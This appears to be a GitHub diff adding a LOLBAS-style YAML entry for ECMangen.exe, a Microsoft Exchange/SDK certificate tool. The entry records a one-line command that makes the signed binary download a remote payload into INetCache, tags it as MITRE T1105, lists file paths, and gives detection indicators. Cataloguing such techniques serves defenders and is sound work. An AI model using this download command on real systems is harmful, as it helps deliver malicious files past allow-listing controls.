File tree Expand file tree Collapse file tree 1 file changed +29
-0
lines changed
Expand file tree Collapse file tree 1 file changed +29
-0
lines changed Original file line number Diff line number Diff line change 1+ ---
2+ Name : ECMangen.exe
3+ Description : Command-line tool for managing certificates in Microsoft Exchange Server.
4+ Author : Avihay Eldad
5+ Created : 2024-04-30
6+ Commands :
7+ - Command : ECMangen.exe {REMOTEURL}
8+ Description : Downloads payload from remote server
9+ Usecase : It will download a remote payload and place it in INetCache
10+ Category : Download
11+ Privileges : User
12+ MitreID : T1105
13+ OperatingSystem : Windows
14+ Tags :
15+ - Download : INetCache
16+ Full_Path :
17+ - Path : C:\Program Files (x86)\Microsoft SDKs\Windows\<version>\Bin\ECMangen.exe
18+ - Path : C:\Program Files (x86)\Microsoft SDKs\Windows\<version>\Bin\x64\ECMangen.exe
19+ - Path : C:\Program Files\Microsoft\Exchange Server\<version>\Bin\ECMangen.exe
20+ - Path : C:\Program Files\Microsoft\Exchange Server\Bin\ECMangen.exe
21+ - Path : C:\Program Files\Microsoft\Exchange Server\ClientAccess\Bin\ECMangen.exe
22+ - Path : C:\ExchangeServer\Bin\ECMangen.exe
23+ Detection :
24+ - IOC : URL on a ECMangen command line
25+ - IOC : ECMangen making unexpected network connections or DNS requests
26+ Acknowledgement :
27+ - Person : Avihay Eldad
28+ Handle : ' @AvihayEldad'
29+ ---
You can’t perform that action at this time.
![github-actions[bot]](https://avatars.githubusercontent.com/in/15368?v=4&size=40){kind=avatar}
0 commit comments